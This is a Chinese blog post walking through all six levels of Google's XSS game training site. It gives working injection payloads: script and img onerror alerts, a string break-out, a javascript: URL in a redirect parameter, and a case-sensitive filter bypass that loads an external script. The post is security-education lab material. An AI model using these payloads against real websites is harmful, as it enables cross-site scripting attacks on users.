<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 5.4.2">
<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"yoursite.com","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.21.0","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"buttons","active":null,"storage":true,"lazyload":true,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":null,"post_header":null,"post_body":null,"coll_header":null,"sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="『第一关』第一关是个非常脆弱的反射性xss攻击。向url或者form表单中注入xss代码都可以实现攻击。把下面的俩例子粘贴到表单中，点击搜索按钮： 12&lt;img src&#x3D;x onerror&#x3D;&quot;alert(&amp;#x27;xss&amp;#x27;)&quot;&gt;&lt;script&gt;alert(&quot;xss&quot;);&lt;&#x2F;script&gt;">
<meta property="og:type" content="article">
<meta property="og:title" content="google xss game 通关攻略">
<meta property="og:url" content="http://yoursite.com/2019/01/12/google-xss-game/index.html">
<meta property="og:site_name" content="tbswang&#39;s blogs">
<meta property="og:description" content="『第一关』第一关是个非常脆弱的反射性xss攻击。向url或者form表单中注入xss代码都可以实现攻击。把下面的俩例子粘贴到表单中，点击搜索按钮： 12&lt;img src&#x3D;x onerror&#x3D;&quot;alert(&amp;#x27;xss&amp;#x27;)&quot;&gt;&lt;script&gt;alert(&quot;xss&quot;);&lt;&#x2F;script&gt;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-01-11T16:00:00.000Z">
<meta property="article:modified_time" content="2024-10-30T08:02:10.810Z">
<meta property="article:author" content="tbswang">
<meta property="article:tag" content="翻译">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://yoursite.com/2019/01/12/google-xss-game/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://yoursite.com/2019/01/12/google-xss-game/","path":"2019/01/12/google-xss-game/","title":"google xss game 通关攻略"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>google xss game 通关攻略 | tbswang's blogs</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">tbswang's blogs</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E4%B8%80%E5%85%B3%E3%80%8F"><span class="nav-number">1.</span> <span class="nav-text">『第一关』</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E4%BA%8C%E5%85%B3%E3%80%8F"><span class="nav-number">2.</span> <span class="nav-text">『第二关』</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E4%B8%89%E5%85%B3%E3%80%8F"><span class="nav-number">3.</span> <span class="nav-text">『第三关』</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E5%9B%9B%E5%85%B3%E3%80%8F"><span class="nav-number">4.</span> <span class="nav-text">『第四关』</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E4%BA%94%E5%85%B3%E3%80%8F"><span class="nav-number">5.</span> <span class="nav-text">『第五关』</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%8E%E7%AC%AC%E5%85%AD%E5%85%B3%E3%80%8F"><span class="nav-number">6.</span> <span class="nav-text">『第六关』</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">tbswang</p>
  <div class="site-description" itemprop="description">计算机技术</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/tbswang" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tbswang" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/01/12/google-xss-game/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="tbswang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tbswang's blogs">
      <meta itemprop="description" content="计算机技术">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="google xss game 通关攻略 | tbswang's blogs">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          google xss game 通关攻略
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-01-12 00:00:00" itemprop="dateCreated datePublished" datetime="2019-01-12T00:00:00+08:00">2019-01-12</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><!-- # google的xss游戏通关攻略 -->
<h2 id="『第一关』"><a href="#『第一关』" class="headerlink" title="『第一关』"></a><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level1">『第一关』</a></h2><p>第一关是个非常脆弱的反射性xss攻击。向url或者form表单中注入xss代码都可以实现攻击。把下面的俩例子粘贴到表单中，点击搜索按钮：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">x</span> <span class="attr">onerror</span>=<span class="string">&quot;alert(&#x27;xss&#x27;)&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&quot;xss&quot;</span>);</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<span id="more"></span>
<p>如果把上面的俩例子注入到url中，点击go按钮（这个按钮是这个假浏览器的一部分），攻击可以生效。唯一的限制就是，如果拼接到url后面代码中包含一个分号，是不会起作用的。上面的第二个例子中，也可以省略分号，因为这script脚本只有一行。</p>
<p>但是，如果把分号用url编码成<code>%3B</code>,然后注入到url中，也可以攻击生效。注意，还需要在攻击代码之前添加<code>?query=</code>。因此就是连接下面三个片段：</p>
<ol>
<li><code>https://xss-game.appspot.com/level1/frame</code></li>
<li><code>?query=</code></li>
<li><code>&lt;script&gt;alert(&quot;xss&quot;)%3B&lt;/script&gt;</code></li>
</ol>
<p>那么完整的url就是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level1/frame?query=&lt;script&gt;alert(&quot;xss&quot;)%3B&lt;/script&gt;</span><br></pre></td></tr></table></figure>


<h2 id="『第二关』"><a href="#『第二关』" class="headerlink" title="『第二关』"></a><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level2">『第二关』</a></h2><p>第二关是一个关于存储型的xss攻击。这一关的做了一些过滤，防止你直接注入<code>script</code>标签。但是img标签是可以用的。而img标签允许可以添加一些监听函数（比如可以增加<code>onerror</code>），这里面是包含js代码的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>一旦攻击代码通过表单提交，每次载入这个页面，我们的js代码就可以在用户的浏览器运行–或者任何人–只要他们访问了这个网页。这也是为什么存储型的xss比反射性的危害更大。</p>
<p>我没有找到一个直接向url中注入代码的方法。</p>
<h2 id="『第三关』"><a href="#『第三关』" class="headerlink" title="『第三关』"></a><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level3">『第三关』</a></h2><p>为了通过第三关，我只能使用Safari (10.0.3)，因为Firefox (51.0.1) and Chrome (55.0.2883.95)都阻止向url中注入一个空格，不管有没有进行url编码。我用下面的url在safari中成功通过第三关。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level3/frame&#x27; onerror=&quot;alert(&#x27;xss&#x27;)&quot;</span><br></pre></td></tr></table></figure>
<p>但我还是想用firefox通过。所以我拷贝了safari中叫做level3的cookie。我做了一下的步骤：</p>
<ol>
<li>我设置safari使用Burp proxy。</li>
<li>我用上面的方法通过第一关和第二关。</li>
<li>我用上面的添加了攻击代码的url访问访问第三关。当alert()弹出的时候，游戏就会设置一个叫做level3的cookie。</li>
<li>我复制了这三个cookie <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">level1=f148716ef4ed1ba0f192cde4618f8dc5; level2=b5e530302374aa71cc3028c810b63641; level3=d5ce029d0680b3816a349da0d055fcfa;</span><br></pre></td></tr></table></figure>
下面的代码是如何在火狐和chrome的开发者工具的console窗口设置新的cookie<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.cookie=&quot;level3=d5ce029d0680b3816a349da0d055fcfa&quot;;</span><br></pre></td></tr></table></figure></li>
</ol>
<p>现在就可以在火狐或者Chrome中进入下一关。不像那个由这个游戏设置的cookie，我们自己手动设置的cookie在此次回话结束后就过期。所以，如果你现在关闭<code>xss- game.appspot.com</code>的标签页，再重新打开这个网页，就会发现无法到第四关。这是因为第三关的cookie在刚才回话结束后就失效了。因此，最好的办法是手动给cookie设置过期时间的<code>expire</code>属性。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.cookie=&quot;level3=d5ce029d0680b3816a349da0d055fcfa;expires=&#x27; Fri, 22 July 2022 5:34:56 GMT&#x27;&quot;;</span><br></pre></td></tr></table></figure>
<p>也可以像这样设置cookie的其他属性，这里关于<code>document.cookie</code><a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie">说明</a>非常详细。</p>
<p>组装img的代码， 如果我使用单引号提前截断，就可以注入<br><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level3/frame#1">https://xss-game.appspot.com/level3/frame#1</a>‘ onerror&#x3D;”alert(1)”&#x2F;&gt;</p>
<h2 id="『第四关』"><a href="#『第四关』" class="headerlink" title="『第四关』"></a>『第四关』</h2><p>我没做出来。我谷歌了一些答案，但是并没有得到预期的结果。最终，我发现，在这三个浏览器中，如果你把下面的字符串输入到表单中，然后点击「create button」按钮，它是可以生效的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;);alert();var b=(&#x27;</span><br></pre></td></tr></table></figure>

<p>但是，要想直接注入url中使攻击生效，你必须对攻击的字符串进行url编码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%27%29%3Balert%28%29%3Bvar+b%3D%28%27</span><br></pre></td></tr></table></figure>

<p>有很多网站可以替你做这些。但是他们有bug，不可信。最近，我开始使用一个在python2.7在默认包含的方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> urllib</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>foo = <span class="string">&quot;&#x27;);alert();var b=(&#x27;&quot;</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>urllib.quote_plus(foo)</span><br><span class="line"><span class="string">&#x27;%27%29%3Balert%28%29%3Bvar+b%3D%28%27&#x27;</span></span><br></pre></td></tr></table></figure>

<p>记住，在变量的赋值中，用双引号包裹攻击字符串。也不要忘记，移除python在输出结果外边的单引号。在python3中有轻微的不同。我在StackExchange.com的一个<a target="_blank" rel="noopener" href="http://stackoverflow.com/a/9345102">答案</a>中学到了这个。</p>
<p>与第一关中的url拼接类似，我们需要向攻击的字符串中添加合适的变量名，以及在变量名之前添加<code>?</code>和变量名之后添加<code>=</code>。也就是说连接下面的几个部分:</p>
<ol>
<li><code>https://xss-game.appspot.com/level4/frame</code></li>
<li><code>?timer=</code></li>
<li><code>%27%29%3Balert%28%29%3Bvar+b%3D%28%27</code></li>
</ol>
<p>这样可以得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level4/frame?timer=%27%29%3Balert%28%29%3Bvar+b%3D%28%27</span><br></pre></td></tr></table></figure>

<p>然后点击这个假的浏览器中的『go』按钮。</p>
<h2 id="『第五关』"><a href="#『第五关』" class="headerlink" title="『第五关』"></a><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level5">『第五关』</a></h2><p><br>为了通过这一关，需要按照以下的步骤：</p>
<ol>
<li><p>点击『sign up』链接。</p>
</li>
<li><p>在下一页，url会变成这样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level5/frame/signup?next=confirm</span><br></pre></td></tr></table></figure>

<p>在url中把<code>next</code>的值从<code>confirm</code>变成<code>javascript:alert(1)</code>。</p>
</li>
<li><p>点击假浏览器中的『go』按钮。点击这个按钮可以改变『Next &gt;&gt;』的<code>href</code>连接的地址。在点击『go』按钮之前，如果把鼠标悬浮到『Next &gt;&gt;』上，目标地址是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level5/frame/confirm</span><br></pre></td></tr></table></figure>

<p>实际中，<code>href</code>的值相对路径连接，只是一个『confirm』。当把『confirm』变成<code>javascript:alert(1)</code>，url就被设置为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)</span><br></pre></td></tr></table></figure>

<p>此时，点击『go』按钮，把鼠标悬浮到『Next &gt;&gt;』上，目标地址是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br></pre></td></tr></table></figure>

<p>用户手动编辑了url后，『href』的链接就变成用户的输入。</p>
</li>
<li><p>点击『Next &gt;&gt;』链接，会显示一个弹出框，这个游戏会设置一个新的cookie，显示一个信息框，提示说你可以进入下一关。</p>
</li>
</ol>
<p>我认为这个课程是说如果你不能注入标签，你也可以注入在真实的资源标识符前面添加<code>javascript:</code> 。我不得不点击所有四个提示，直到我按照提示4的连接<a target="_blank" rel="noopener" href="https://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00">this IETF draft</a></p>
<h2 id="『第六关』"><a href="#『第六关』" class="headerlink" title="『第六关』"></a><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/level6">『第六关』</a></h2><p>对于第六关，我得好好找找答案。实际上，这是一个客户端自定义的正则表达式的匹配过滤，这个过滤大小写敏感，过滤掉<code>http</code> or <code>https</code>开头的url。所以，一下是一个成功的url：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level6/frame#HTTPS://xss.rocks/xss.js</span><br></pre></td></tr></table></figure>

<p>我用了一个<a target="_blank" rel="noopener" href="http://xss.rocks/">xss.rocks</a>无害的js文件</p>
<p>我没有猜答案。我查看了源代码，看到在接下来的函数中阻止我注入<code>http</code>或者<code>https</code>.我也没把正则表达式拿来测试。我在 w3scholl.com <a target="_blank" rel="noopener" href="http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_match_regexp2">“Try It” page</a>测试js<br>字符串的match()方法.</p>
<p>这个函数可以再源代码的57行看到：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// This will totally prevent us from loading evil URLs!</span></span><br><span class="line"><span class="keyword">if</span> (url.<span class="title function_">match</span>(<span class="regexp">/^https?:\/\//</span>)) &#123;</span><br><span class="line">  <span class="title function_">setInnerText</span>(<span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;log&quot;</span>),</span><br><span class="line">    <span class="string">&quot;Sorry, cannot load a URL containing \&quot;http\&quot;.&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中的正则<code>/^https?:\/\//</code>可以匹配<code>http</code>或者<code>https</code>。如果开发者增加了i标记，这个正则就可以匹配大写或者小写。大小写不敏感的正则是<code>/^https?:\/\//i</code>。</p>
<p>我猜这一关的课主要是告诉你，应该浏览所有的源代码，看看开发者是不是写了客户端过滤的代码，看看他们是不是也犯错误。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BF%BB%E8%AF%91/" rel="tag"># 翻译</a>
              <a href="/tags/xss/" rel="tag"># xss</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2019/01/12/hello-world/" rel="prev" title="Hello World">
                  <i class="fa fa-angle-left"></i> Hello World
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2019/02/24/%E3%80%8E%E6%9E%84%E5%BB%BA%E4%B9%8B%E9%81%93%E3%80%8F%E7%9A%84%E8%AF%BB%E4%B9%A6%E6%8A%A5%E5%91%8A/" rel="next" title="『构建之道』的读书报告">
                  『构建之道』的读书报告 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    
  <div class="comments" id="disqus_thread">
    <noscript>Please enable JavaScript to view the comments powered by Disqus.</noscript>
  </div>
  
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">tbswang</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/lozad@1.16.0/dist/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


<script class="next-config" data-name="disqus" type="application/json">{"enable":true,"shortname":"tbswang","count":false,"i18n":{"disqus":"disqus"}}</script>
<script src="/js/third-party/comments/disqus.js"></script>

</body>
</html>
